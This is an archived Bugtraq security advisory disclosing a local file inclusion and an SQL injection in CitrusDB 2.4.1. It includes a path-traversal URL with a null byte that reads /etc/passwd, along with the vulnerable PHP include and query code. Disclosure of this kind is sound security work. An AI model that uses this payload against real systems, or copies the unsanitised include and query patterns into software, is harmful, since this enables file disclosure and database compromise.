[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CitrusDB 2.4.1 - LFI/SQLi Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CitrusDB 2.4.1 - LFI/SQLi Vulnerability
From: blaszczakm@xxxxxxxxx
Date: Sat, 7 Apr 2012 16:00:12 GMT

CitrusDB 2.4.1 - LFI/SQLi Vulnerability
Author: Michal `wacky` Blaszczak 
WWW: blaszczakm.blogspot.com


CitrusDB is an open source customer service and billing database.
It can be used by customer service personnel to provide sales and support to 
customers, 
and by billing staff to bill customers for their services via invoices and 
credit card batches. 
Customers may access the Online customer account manager to view their 
services, billing history,
and make service and support requests online.

1) LFI
http://192.168.51.8/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base

index.php:315

    $filepath = "$path_to_citrus/$load.php";
                if (file_exists($filepath)) {
                        include('./'.$load.'.php');


2) SQL INJECTION

include/user.class.php:134

$sql="SELECT password FROM user WHERE username='$user_name' LIMIT 1";

Prev by Date: [waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin
Next by Date: [Suspected Spam] AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow Vulnerabilities
Previous by thread: [waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin
Next by thread: [Suspected Spam] AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow Vulnerabilities
Index(es):
- Date
- Thread